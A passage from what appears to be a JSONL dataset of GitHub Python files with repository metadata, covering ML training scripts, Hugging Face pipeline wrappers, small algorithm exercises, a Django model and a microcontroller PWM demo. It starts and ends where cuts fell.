os.path.join(pred_save_dir, 'pred_para.tsv')\n else:\n pred_save_dir = os.path.join(pred_save_dir, 'pred.tsv')\n logging.info('[Eval] Will save pred at ' + str(pred_save_dir) + '.')\n\n logging.info('Start testing ଘ(੭*ˊᵕˋ)੭* ੈ♡‧₊˚')\n\n if args.pred_para:\n if args.do_train:\n verbose = False\n else:\n verbose = True\n metrics = {\"rlet\": EBPredMetricWithPara(test=True, out_path=pred_save_dir, verbose=verbose,\n inter_cache_path=args.inter_cache_path, pred_para=args.pred_para)}\n else:\n metrics = {\"rlet\": EBPredMetric(test=True, out_path=pred_save_dir, verbose=False)}\n\n print(f\"Set k_test = {args.K_test} in evaluation.\")\n\n t_begin = time.time()\n evaluator = Evaluator(model, driver='torch', device=device, dataloaders=test_dl,\n metrics=metrics,\n progress_bar='rich',\n kwargs={\"use_dist_sampler\": False},\n fp16=args.fp16\n )\n\n evaluator.run()\n t_end = time.time()\n print(f'Finished evaluating on TEST {len(test_data)} examples.')\n print(f'Test duration: {t_end - t_begin} sec.')\n\n fitlog.finish()\n\n\nif __name__ == \"__main__\":\n do_train()\n","repo_name":"tengxiaoliu/RLET","sub_path":"src/rl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"8645048437","text":"\"\"\"\n author: ShilpaItnal23\n \n email:saishilpa723@gmail.com\n \n\"\"\"\n\nimport os\nfrom src.utils.common import read_config\nfrom src.utils.data_mgmt import get_data\nfrom src.utils.model import create_model, save_model, save_plot\nimport argparse\nimport logging\nimport os\nimport pandas as pd\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s] %(message)s\"\nlog_dir = \"logs\"\nos.makedirs(log_dir, exist_ok=True)\nlogging.basicConfig(filename= os.path.join(log_dir,\"running_logs.log\"),level=logging.INFO, format=logging_str, filemode=\"a\")\n\n\n\ndef training(config_path):\n config = read_config(config_path)\n logging.info(f\"This reads data from config file{config}\")\n validation_datasize = config[\"params\"][\"validation_datasize\"]\n (X_train, y_train), (X_valid, y_valid), (X_test, y_test) = get_data(validation_datasize)\n LOSS_FUNCTION = config[\"params\"][\"loss_function\"]\n OPTIMIZER = config[\"params\"][\"optimizer\"]\n METRICS = config[\"params\"][\"metrics\"]\n NUM_CLASSES = config[\"params\"][\"num_classes\"]\n\n model = create_model(LOSS_FUNCTION, OPTIMIZER, METRICS, NUM_CLASSES)\n\n EPOCHS = config[\"params\"][\"epochs\"]\n VALIDATION_SET = (X_valid, y_valid)\n\n history = model.fit(X_train, y_train, epochs=EPOCHS,\n validation_data=VALIDATION_SET)\n\n artifacts_dir = config[\"artifacts\"][\"artifacts_dir\"]\n model_dir = config[\"artifacts\"][\"model_dir\"]\n model_dir_path = os.path.join(artifacts_dir, model_dir)\n os.makedirs(model_dir_path, exist_ok=True)\n model_name = config[\"artifacts\"][\"model_name\"]\n save_model(model, model_name, model_dir_path)\n\n plot_dir = config[\"artifacts\"][\"plot_dir\"]\n plot_dir_path=os.path.join(artifacts_dir, plot_dir)\n os.makedirs(plot_dir_path, exist_ok=True)\n plot_name = config[\"artifacts\"][\"plot_name\"]\n loss_acc=history.history\n save_plot(loss_acc,plot_name,plot_dir_path)\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n\n args.add_argument(\"--config\", \"-c\", default=\"config.yaml\")\n\n parsed_args = args.parse_args()\n try:\n logging.info(\">>>>> starting ANN training >>>>>\")\n training(config_path=parsed_args.config)\n logging.info(\"<<<<< ANN training done successfully<<<<<\\n\")\n except Exception as e:\n logging.exception(e)\n raise e ","repo_name":"ShilpaItnal23/ANN-implementation-demo","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72615060054","text":"n, k = map(int, input().split())\n\nif k == 1:\n for i in range(1, n + 1):\n print(i, end=' ')\nelif k > n / 2:\n print(\"Impossible\")\nelse:\n even = (n // 2) + 1\n odd = 1\n\n for i in range(0, n // 2):\n print(even, odd, end=' ')\n even += 1\n odd += 1\n if n % 2 != 0:\n print(n)\n","repo_name":"HamidMolareza/QueraProblems","sub_path":"Solutions/4068/python3/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"67"} +{"seq_id":"24897062665","text":"#! /usr/bin/env python\n\nimport os\nfrom textwrap import dedent\nfrom .common import render_output_text, is_gpu_available\n\n# this is nasty but we have to make sure the HF model cache directory is\n# created before we load in the transformers library\ndef _setup():\n # make sure that the models cache is set up\n if not 'TRANSFORMERS_CACHE' in os.environ:\n if not os.path.exists('./model_cache/hf'):\n os.makedirs('./model_cache/hf')\n\n # set the environment variable\n os.environ['TRANSFORMERS_CACHE'] = os.path.abspath('./model_cache/hf')\n\n_setup()\n\n\nfrom transformers import pipeline, set_seed # type: ignore\nfrom transformers.utils.logging import set_verbosity_error\n\nfrom typing import List, Any, Optional\nfrom IPython.display import Markdown, display\n\n\n# silence errors from deep within Transformers\nset_verbosity_error()\n\n\ndef _seed_if_necessary(seed: Optional[int]):\n '''\n Quick function that sets the seed if it's passed. If not provided,\n no seed will be explicitly set\n\n :param seed: Seed to set or None or -1\n '''\n if seed is not None and seed != -1:\n set_seed(seed)\n\n\ndef _get_pipeline_device(accelerate: bool = True):\n '''\n Determine CUDA device to use.\n\n :param accelerate: (optional) Whether to use acceleration if it is available. Default True\n :return: The pipeline device argument\n '''\n if accelerate and is_gpu_available():\n return 0\n\n return -1\n\n\ndef summarization(\n text: str,\n model: str ='facebook/bart-large-cnn',\n max_length: int =130,\n min_length: int =30,\n do_sample: bool = False,\n accelerate: bool = True,\n seed: Optional[int] = None,\n render: bool = True\n ):\n '''\n Summarize text from a prompt.\n\n :param text: The text to summarize.\n :param model: (optional) The model to use for summarization (default `facebook/bart-large-cnn`)\n :param max_length: (optional) The minimum length of the summary. (default 30)\n :param min_length: (optional) The maximum length of the summary. (default 130)\n :param do_sample: (optional) Whether to subsample input (default False)\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n :return: A summarization of the original text.\n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='summarization', model=model, device=device)\n\n results = pipe(\n text,\n max_length=max_length,\n min_length=min_length,\n do_sample=do_sample\n )\n\n # convert results to a list of strings\n results = [r['summary_text'] for r in results]\n\n # skip render attempt if not requested\n if not render:\n return results\n\n return render_output_text(results)\n\n\ndef text_generation(\n prompt: str, \n max_length: int = 200,\n num_return_sequences: int = 3,\n model: str ='small',\n seed: Optional[int] =None,\n accelerate: bool = True,\n render: bool = True\n ):\n '''\n Generate text from a prompt.\n\n Options for model are:\n - 'small', 'medium', 'large' (mapping to distilgpt2, gpt2, and gpt-2-large)\n - any other text model on HF\n\n Some models to try:\n - EleutherAI/gpt-j-6b\n - facebook/opt-1.3b\n\n :param prompt: Text to prompt the pipeline with.\n :param model: (optional) Model to use. Default 'small'.\n :param max_length: (optional) Length of text to generate. Default 200.\n :param num_return_sequences: (optional) Number of different responses to make. Default 3.\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n\n :returns: A list of text generated by the model.\n '''\n\n _seed_if_necessary(seed)\n\n if model in ['small', 'medium', 'large']:\n mapping = {\n 'small': 'distilgpt2',\n 'medium': 'gpt2',\n 'large': 'gpt2-large'\n }\n model = mapping[model]\n\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='text-generation', model=model, device=device)\n\n results = pipe(\n prompt,\n max_length=max_length,\n num_return_sequences=num_return_sequences\n )\n\n # convert results to a list of strings\n results = [r['generated_text'] for r in results]\n\n # skip render attempt if not requested\n if not render:\n return results\n\n return render_output_text(results)\n\n\n\ndef sentiment_analysis(\n text: str,\n model: str = 'distilbert-base-uncased-finetuned-sst-2-english',\n accelerate: bool = True,\n seed: Optional[int] = None,\n render: bool =True\n ):\n '''\n Analyze the sentiment of a particular piece of text.\n\n :param text: The text to analyze.\n :param model: (optional) The model to use for analysis. (default 'distilbert-base-uncased-finetuned-sst-2-english')\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n :return: The most likely sentiment of the text.\n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='sentiment-analysis', model=model, device=device)\n\n sentiment = pipe(text)[0]\n\n if not render:\n return sentiment\n\n color = 'red' if sentiment['label'] == 'NEGATIVE' else 'green';\n return display(Markdown(f'{sentiment[\"label\"]} (score: {sentiment[\"score\"]*100}%)'))\n\n\ndef mask_filling(\n text: str,\n model: str = 'bert-base-uncased',\n accelerate: bool = True,\n seed: Optional[int] = None,\n render: bool = True\n ):\n '''\n Guess words that fill a specific slot in some text. The default mask token is [MASK].\n\n :param text: The text to fill, with the mask token in it.\n :param model: (optional) The model to use. (default 'bert-base-uncased')\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n :return: A string with the mask filled in.\n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='fill-mask', model=model, device=device)\n\n masks = pipe(text)\n\n if not render:\n return masks\n\n # helper to render a string as bold\n def render_mask_result(i, obj):\n bolded = obj['sequence'].replace(obj['token_str'], f'**{obj[\"token_str\"]}**')\n\n return f'Sample {i+i} ({100*obj[\"score\"]:4}\\n\\n> {bolded}'\n\n # render each item with a seqeunce number\n masks = '\\n\\n'.join([render_mask_result(i, obj) for i, obj in enumerate(masks)])\n\n return display(Markdown(masks))\n\n\ndef question_answering(\n question: str,\n context: str,\n model: str = 'deepset/roberta-base-squad2',\n accelerate: bool = True,\n seed: Optional[int] = None,\n render: bool =True\n ):\n '''\n Answer a question about some given context.\n\n :param question: The question to answer from the data.\n :param context: The context from which to draw the answer.\n :param model: (optional) The model to use. (default 'deepset/roberta-base-squad2')\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n :return: \n :rtype: \n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='question-answering', model=model, device=device)\n\n answer = pipe({\n 'question': question,\n 'context': context\n })\n\n if not render:\n return answer\n\n return display(Markdown(dedent(f'''\\\n Answer: **{answer['answer']}**\n\n Score: `{answer['score']}` \n Position: {answer['start']} to {answer['end']}\n ''')))\n\n","repo_name":"pkage/ai-storytelling-backstage","sub_path":"code/aist/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"39344146203","text":"import gym\nfrom meta_critics.running_spec import RunningSpec, RunningSpecError\nfrom meta_critics.app_globals import get_running_mode, SpecTypes\nfrom meta_critics.envs.bandits.bandit_bernoulli_env import *\n\nenv = gym.make('Bandit-K5-v0', k=10)\n\nobservation, info = env.reset(seed=42)\nprint(observation)\n\nfor _ in range(1000):\n action = env.action_space.sample()\n obs, reward, terminated, truncated, _ = env.step(action)\n print(obs)\n if terminated or truncated:\n observation, info = env.reset()\n\nenv.close()","repo_name":"spyroot/DH-MAML","sub_path":"mujoco_task_test/main_banditenv.py","file_name":"main_banditenv.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25664724104","text":"def count(t,x):\n\tt.sort()\n\tboxCount = 0\n\n\tj = 0 \n\tfor i in range(len(t) - 1, -1, -1):\n\n\t\tif(j < i and t[i] + t[j] <= x):\n\t\t\t# print(f'if {t[i]}-{t[j]}')\n\t\t\t# boxCount += 1\n\t\t\tj += 1\n\t\telse:\n\t\t\t# print(f'else {t[i]}-{t[j]}')\n\t\t\tboxCount += 1\n\n\treturn boxCount\n\t\n\n\nif __name__ == \"__main__\":\n\tprint(count([1,2,3,4],10)) # 2\n\tprint(count([4,4,4,4],5)) # 4\n\tprint(count([7,2,3,9],10)) # 3\n\tprint(count([4,2,1,5,3],6)) #5 3\n\tprint(count([5, 3, 1, 4, 2], 10)) # 3\n\tprint(count([5, 4, 3, 2, 1], 5)) # 3\n\n\n#CASES\n# if item == boxSize\n# if item < boxSize then add it,\n\n\n\n\t# \tboxCount = 0 \n\t# itemCount = 1\n\t# remaingSpace = [0]*len(t) \n\t# for i in range(len(t)): \n\t\t\t\n\t# \tj = 0 \n\t# \tminSpace = x + 1 \n\t# \tboxIndex = 0 \n\n\t# \tfor j in range(boxCount): \n\t# \t\tif (remaingSpace[j] >= t[i] and remaingSpace[j] - t[i] < minSpace) and itemCount < 2: \n\t# \t\t\t\tboxIndex = j \n\t# \t\t\t\titemCount += 1\n\t# \t\t\t\tminSpace = remaingSpace[j] - t[i] \n\n\t# \tif (minSpace == x + 1): \n\t# \t\tremaingSpace[boxCount] = x - t[i] \n\t# \t\tboxCount += 1 \n\t# \t\titemCount = 1\n\t# \telse:\n\t# \t\titemCount += 1\n\t# \t\tremaingSpace[boxIndex] -= t[i] \n\n\t# return boxCount ","repo_name":"plahteenlahti/tiras20","sub_path":"boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72094901335","text":"\"\"\"\n# Definition for Employee.\nclass Employee:\n def __init__(self, id: int, importance: int, subordinates: List[int]):\n self.id = id\n self.importance = importance\n self.subordinates = subordinates\n\"\"\"\n\nclass Solution:\n def getImportance(self, employees: List['Employee'], id: int) -> int:\n employee = None\n \n for e in employees:\n if e.id == id:\n employee = e\n\n if employee is None:\n return 0\n \n res = employee.importance\n stack = [*employee.subordinates]\n visited = { employee.id }\n employee_ids_map = { emp_i.id:emp_i for emp_i in employees }\n \n while stack:\n e_id = stack.pop()\n \n if e_id in visited:\n continue\n \n e = employee_ids_map[e_id] \n res += e.importance\n \n for sub_id in e.subordinates:\n stack.append(sub_id)\n \n return res\n","repo_name":"kokosda/sport-programming","sub_path":"src/leetcode/employee_importance.py","file_name":"employee_importance.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37999256344","text":"import numpy as np\nimport util\n\nfrom linear_model import LinearModel\n\n\ndef main(train_path, eval_path, pred_path):\n \"\"\"Problem 1(e): Gaussian discriminant analysis (GDA)\n\n Args:\n train_path: Path to CSV file containing dataset for training.\n eval_path: Path to CSV file containing dataset for evaluation.\n pred_path: Path to save predictions.\n \"\"\"\n # Load dataset\n x_train, y_train = util.load_dataset(train_path, add_intercept=False)\n\n # *** START CODE HERE ***\n x_eval, y_eval = util.load_dataset(eval_path, add_intercept=True)\n\n GDA_model = GDA()\n GDA_model.fit(x_train, y_train)\n\n y_pred = GDA_model.predict(x_eval)\n # plot decision boundary\n util.plot(x=x_train, y=y_train, theta=GDA_model.theta, save_path='output/p01e{0}.png'.format(pred_path[16:-4]),\n x_eval=x_eval, y_pred=y_pred)\n np.savetxt(pred_path, y_pred, fmt='%d')\n # *** END CODE HERE ***\n\n\nclass GDA(LinearModel):\n def fit(self, x, y):\n \"\"\"Fit a GDA model to training set given by x and y.\n\n Args:\n x: Training example inputs. Shape (m, n).\n y: Training example labels. Shape (m,).\n\n Returns:\n theta: GDA model parameters.\n \"\"\"\n # *** START CODE HERE ***\n m, n = x.shape\n\n ### calculate GDA parameters\n num_y1 = y[y == 1].sum()\n phi = num_y1 / m\n\n mu0 = x[y == 0].sum(axis=0) / (m - num_y1)\n mu1 = x[y == 1].sum(axis=0) / num_y1\n sigma = (((x[y == 0] - mu0).T).dot(x[y == 0] - mu0) + ((x[y == 1] - mu1).T).dot(x[y == 1] - mu1)) / m\n\n ### theta calculation based on GDA parameters\n theta = np.linalg.inv(sigma).dot(mu1 - mu0)\n theta0 = -0.5 * (mu1 - mu0).dot(np.linalg.inv(sigma)).dot(mu1 + mu0) - np.log((1 - phi) / phi)\n self.theta = np.hstack([theta0, theta])\n\n # *** END CODE HERE ***\n\n def predict(self, x, p=False):\n \"\"\"Make a prediction given new inputs x.\n\n Args:\n x: Inputs of shape (m, n).\n p: if return prob of the outcomes\n Returns:\n Outputs of shape (m,).\n \"\"\"\n # *** START CODE HERE ***\n h_x_opt = util.sigmoid(x.dot(self.theta))\n if p:\n return h_x_opt\n else:\n return np.where(h_x_opt >= 0.5, 1, 0)\n # *** END CODE HERE\n","repo_name":"watermantle/Standford_CS229","sub_path":"Problem Set 1/code/src/p01e_gda.py","file_name":"p01e_gda.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8497676792","text":"from __future__ import print_function\nfrom __future__ import division\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nimport h5py as hdf\nimport pylab as pyl\n\nfor i in range(20):\n data_path = '../data/buzzard_v1.0/allbands/truth'\n with hdf.File(data_path + '/truth' + str(i).zfill(2) + '_Oii.hdf5',\n 'r') as f:\n\n mags = f['truth%s_Oii' % (str(i).zfill(2))]\n qs = f['Q']\n try:\n rMag = pyl.append(rMag, mags['OMAG'][:, 2]) # r band\n Qs = pyl.append(Qs, qs.value)\n except NameError:\n rMag = mags['OMAG'][:, 2]\n Qs = qs.value\n\nq0 = pyl.where(Qs == 0)[0]\nr0 = rMag[q0]\nq1 = pyl.where(Qs == 1)[0]\nr1 = rMag[q1]\nq2 = pyl.where(Qs == 2)[0]\nr2 = rMag[q2]\n\n# make a figure\nf = pyl.figure(figsize=(5, 5 * (pyl.sqrt(5.) - 1.0) / 2.0))\nax = f.add_subplot(111)\n\nbins = pyl.linspace(14, 22, 15)\nax.hist(r2,\n weights=pyl.zeros_like(r2) + old_div(1., r2.size),\n histtype='step',\n bins=bins,\n lw=2,\n label='Q=2')\nax.hist(r1,\n weights=pyl.zeros_like(r1) + old_div(1., r1.size),\n histtype='step',\n bins=bins,\n lw=2,\n label='Q=1')\nax.hist(r0,\n weights=pyl.zeros_like(r0) + old_div(1., r0.size),\n histtype='step',\n bins=bins,\n lw=2,\n label='Q=0')\n\nax.legend(loc='upper right')\nax.invert_xaxis()\n\nax.set_ylim(0, 0.5)\nax.set_xlabel('$m_r$ (mag)')\nax.set_ylabel('Fraction of Total')\npyl.show()\n\n# final fractions\ntot = pyl.where(Qs != -1)[0]\nprint(old_div(q0.size, float(tot.size)))\nprint(old_div(q1.size, float(tot.size)))\nprint(old_div(q2.size, float(tot.size)))\n","repo_name":"boada/vpCluster","sub_path":"data/boada/analysis_all/MLmethods/plot_Qhists.py","file_name":"plot_Qhists.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"74197123733","text":"import uuid as uuid\nfrom django.db import models\n\n\nclass Category(models.Model):\n uuid = models.UUIDField(\n 'uuid',\n unique=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(\n max_length=100, db_index=True)\n description = models.TextField(\n blank=True,\n default=''\n )\n\n def __str__(self):\n return self.name","repo_name":"d99b09/django_book_shop","sub_path":"categories/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28420526879","text":"'''\n实验名称:PWM\n版本:v1.0\n日期:2020.4\n作者:01Studio\n说明:输出PWM控制蜂鸣器发出不同频率声音\n'''\n\n#导入相关模块\nimport board\nfrom pulseio import PWMOut\nimport time\n\n#PWM构建,蜂鸣器引脚A4. frequency值必须大于3,否则报错\nPWM = PWMOut(board.A4, duty_cycle=32768,frequency=200,variable_frequency=True)\n\n#循环发出不同频率响声。\nwhile True:\n\n PWM.frequency = 200\n time.sleep(1)\n\n PWM.frequency = 400\n time.sleep(1)\n\n PWM.frequency = 600\n time.sleep(1)\n\n PWM.frequency = 800\n time.sleep(1)\n\n PWM.frequency = 1000\n time.sleep(1)\n","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyBLE-NRF52840/1.基础实验/4.PWM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"3387201338","text":"import os\nimport random\nimport time\nimport logging\nimport shutil\n\nimport voxelmorph as vxm\nimport SimpleITK as sitk\nimport numpy as np\nfrom scipy.ndimage import zoom\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\n\nimport torch.nn.functional as F\nfrom losses import MIND, MSE, NMI, Grad, Dice, MIND_SSC, NCC\nfrom metrics import eval_task3\nfrom monai.transforms import RandAffined\nfrom monai.losses import GlobalMutualInformationLoss\n\n\nclass Task3TrainData(Dataset):\n def __init__(\n self,\n root=\"/home/featurize/data/L2R_Task3/\",\n origin=\"aligned_norm.nii.gz\",\n seg=\"aligned_seg35.nii.gz\",\n mode=\"train\",\n ):\n super().__init__()\n self.mode = mode\n self.pairs = []\n if mode == \"train\":\n subjects = []\n with open(os.path.join(root, \"subjects.txt\")) as f:\n for s in f.readlines():\n num = int(s[:-1][11:15])\n if num <= 437:\n subjects.append(num) # remove /n\n for f in subjects:\n for m in subjects:\n if f != m:\n self.pairs.append(\n [\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % m, origin),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % f, origin),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % m, seg),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % f, seg),\n ]\n )\n else:\n for i in range(438, 457):\n self.pairs.append(\n [\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % (i + 1), origin),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % i, origin),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % (i + 1), seg),\n os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % i, seg),\n ]\n )\n\n def __len__(self,):\n# return 1\n return len(self.pairs)\n\n def __getitem__(self, index):\n moving_image = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][0]))\n fixed_image = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][1]))\n moving_seg = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][2]))\n fixed_seg = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][3]))\n\n # (Z, Y, X) => (X, Y, Z)\n moving_image = moving_image.transpose(2, 1, 0)\n moving_seg = moving_seg.transpose(2, 1, 0)\n fixed_image = fixed_image.transpose(2, 1, 0)\n fixed_seg = fixed_seg.transpose(2, 1, 0)\n\n\n moving_image = torch.from_numpy(moving_image).type(torch.float32).unsqueeze(0)\n moving_seg = torch.from_numpy(moving_seg).type(torch.float32).unsqueeze(0)\n fixed_image = torch.from_numpy(fixed_image).type(torch.float32).unsqueeze(0)\n fixed_seg = torch.from_numpy(fixed_seg).type(torch.float32).unsqueeze(0)\n\n return moving_image, moving_seg, fixed_image, fixed_seg\n \ndef train(model, data_loader, optimizer, epochs, device=torch.device(\"cuda\")):\n train_loader, val_loader = data_loader\n # mind = MIND_SSC().loss\n # mind = NMI(np.linspace(0,1,48), half_size).loss\n # mind = MIND(2,3,half_size,use_gaussian_kernel=True, use_fixed_var=False)\n mind = NCC().loss\n# mind = GlobalMutualInformationLoss()\n labmbda = 2\n grad = Grad(\"l2\", labmbda).loss\n dice = Dice([1, 2, 3, 4], 0.5).loss\n logging.info(f\"loss: NCC+ {labmbda} * L2\")\n model.train()\n model.to(device=device)\n for e in range(epochs):\n t_loss_list = []\n f_loss_list = []\n iter_time = time.time()\n for i, (moving_img, moving_seg, fixed_img, fixed_seg) in enumerate(\n train_loader\n ):\n moving_img = moving_img.to(device=device)\n fixed_img = fixed_img.to(device=device)\n\n moved_img, flow = model(moving_img, fixed_img)\n\n t_loss = mind(moved_img, fixed_img)\n f_loss = grad(0, flow)\n \n loss = t_loss + f_loss\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n t_loss_list.append(t_loss.item())\n f_loss_list.append(f_loss.item())\n if (i+1) % 200 == 0:\n t_loss_list = np.array(t_loss_list)\n f_loss_list = np.array(f_loss_list)\n # d_loss_list = np.array(d_loss_list)\n logging.info(\n \"Train: iter[%03d | %03d]\\ttime=%f\\tloss=%f\"\n % (\n i,\n len(train_loader),\n time.time() - iter_time,\n np.array(t_loss_list).mean() + np.array(f_loss_list).mean(),\n )\n )\n validate(\n model, val_loader, e * len(train_loader) + i, device,\n )\n iter_time = time.time()\n t_loss_list = []\n f_loss_list = []\n \n\n\ndef validate(\n model, val_loader, iters, device,\n):\n dice_list = []\n hd95_list = []\n SDlogJ_list = []\n start_time = time.time()\n model.eval()\n with torch.no_grad():\n for moving_img, moving_seg, fixed_img, fixed_seg in val_loader:\n moving_img = moving_img.to(device=device)\n fixed_img = fixed_img.to(device=device)\n\n _, flow = model(moving_img, fixed_img)\n disp_field = flow.detach().cpu().numpy()[0]\n disp_field = np.array([zoom(disp_field[i], 0.5, order=2) for i in range(3)])\n metrics = eval_task3(\n disp_field,\n moving_seg.numpy()[0, 0, ...],\n fixed_seg.numpy()[0, 0, ...],\n )\n dice_list.append(metrics[0])\n hd95_list.append(metrics[1])\n SDlogJ_list.append(metrics[2])\n dice_list = np.array(dice_list)\n hd95_list = np.array(hd95_list)\n SDlogJ_list = np.array(SDlogJ_list)\n logging.info(\n \"Val: \\t\\t\\ttime=%f\\tdice=%f\\thd95=%f\\tSDlogJ=%f\"\n % (\n time.time() - start_time,\n dice_list.mean(),\n hd95_list.mean(),\n SDlogJ_list.mean(),\n )\n )\n global best_metric\n now_metric = dice_list.mean()\n is_best = best_metric < now_metric\n best_metric = max(now_metric, best_metric)\n save_checkpoint(\n {\n \"iters\": iters + 1,\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n },\n is_best,\n des,\n )\n\n\ndef save_checkpoint(state, is_best, des):\n if not os.path.exists(\"./checkpoints/\"):\n os.mkdir(\"./checkpoints/\")\n checkpoint_filename = \"./checkpoints/\" + des + \".checkpoint.pth.tar\"\n best_filename = \"./checkpoints/\" + des + \".model_best.pth.tar\"\n torch.save(state, checkpoint_filename)\n if is_best:\n shutil.copyfile(checkpoint_filename, best_filename)\n logging.info(\"saving best model...\")\n\n\ndes = \"816_task3_3l2_ncc_newmetric_transpConv_unetse_finetune\"\nfull_size = (160, 192, 224)\nhalf_size = (80, 96, 112)\nspacing = (1, 1, 1)\nseg_labels = np.arange(1, 36)\nlr = 1e-3\nbest_metric = 0\ntorch.cuda.set_device(0)\nif __name__ == \"__main__\":\n if not os.path.exists(\"./logs/\"):\n os.mkdir(\"./logs/\")\n if not os.path.exists(\"./checkpoints/\"):\n os.mkdir(\"./checkpoints/\")\n logging.basicConfig(\n filename=os.path.join(\"./logs/\", des),\n level=logging.INFO,\n format=\"%(levelname)s: %(message)s\",\n )\n \n seed = 820\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n logging.info(f\"random seed={seed}\")\n \n dataset_train = Task3TrainData()\n train_loader = torch.utils.data.DataLoader(\n dataset=dataset_train, batch_size=1, shuffle=True, num_workers=2,\n )\n dataset_val = Task3TrainData(mode=\"val\")\n val_loader = torch.utils.data.DataLoader(\n dataset=dataset_val, batch_size=1, shuffle=False, num_workers=2,\n )\n\n nb_features = [\n [16, 32, 32, 32], # encoder features\n [32, 32, 32, 32, 16, 16], # decoder features\n ]\n model = vxm.VxmDense(full_size, nb_features, int_steps=0)\n logging.info(f\"model: vxmDense, nb_features:{nb_features}, int_steps:{0}\")\n# model = vxm.MyVxmDense(full_size)\n logging.info(f\"model: myvxmDense\")\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n logging.info(f\"optimizer: adam, lr:{lr}, wd:{0}\")\n checkpoints = torch.load(\"./checkpoints/816_task3_3l2_ncc_newmetric_transpConv_unetse.model_best.pth.tar\")\n model.load_state_dict(checkpoints[\"state_dict\"])\n optimizer.load_state_dict(checkpoints[\"optimizer\"])\n for state in optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n train(model, [train_loader, val_loader], optimizer, 5000)\n","repo_name":"MedicalImageAnalysisTutorials/ADLReg","sub_path":"code/task3_voxelmorph_baseline.py","file_name":"task3_voxelmorph_baseline.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"24850579461","text":"\"\"\"\n编写一个高效的算法来判断m x n矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n每行中的整数从左到右按升序排列。\n每行的第一个整数大于前一行的最后一个整数。\n示例 1:\n输入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 3\n输出:true\n示例 2:\n输入:matrix = 